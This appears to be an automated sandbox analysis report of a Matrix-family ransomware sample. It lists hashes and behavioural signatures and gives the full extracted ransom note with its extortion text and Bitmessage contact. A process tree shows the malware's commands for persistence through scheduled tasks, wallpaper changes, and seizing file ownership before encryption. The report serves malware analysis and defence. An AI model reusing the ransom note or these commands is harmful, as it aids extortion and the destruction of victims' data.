Analysis
-
max time kernel
184s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
13-02-2024 05:15
General
-
Target
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
-
Size
1.2MB
-
MD5
268360527625d09e747d9f7ab1f84da5
-
SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
-
SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
-
SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
SSDEEP
24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://myexternalip.com/raw
Extracted
Path
C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf
Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}}
{\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;}
{\*\generator Riched20 10.0.15063}\viewkind4\uc1
\pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par
\pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par
\cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par
\b0 by our automatic software. It became possible because of bad server security. \par
\cf1\b ATENTION!!!\par
\cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par
state and decrypt all your files quickly and safely!\par
\b\par
\cf2 INFORMATION!!!\par
\cf0\b0 Files are not broken!!!\par
Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par
There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par
\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par
* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par
\i0\f0\lang1033\par
\cf3\b HOW TO RECOVER FILES???\par
\cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par
\pard\sl240\slmult1\b\fs28 [email protected] \par
[email protected]\par
[email protected]\cf1\fs24\par
You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par
\pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par
In subject line write your personal ID:\par
\b\fs28 58E16F8109642D40\par
\b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par
\i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par
\i0\par
\cf1\b OUR ADVICE!!!\par
\cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par
\ul\b\par
We will definitely reach an agreement ;) !!!\b0\par
\ulnone\par
\fs20 \par
\par
\par
\par
\par
\par
\par
\pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par
\b0\fs20\par
\pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par
1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par
2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par
3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par
4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par
5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par
\b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par
T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par
\pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 58E16F8109642D40\par
M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par
\pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par
\pard\sa200\sl240\slmult1\fs28 GKw5egDo\cf0\f1\fs32\lang1049\par
\par
}
Emails
URLs
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Executes dropped EXE 59 IoCs
-
Loads dropped DLL 60 IoCs
-
Modifies file permissions 1 TTPs 29 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 64 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops desktop.ini file(s) 40 IoCs
-
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe" -n2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\VsXhzO5K.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f3⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\uSDT8H9y64.exeuSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
-
-
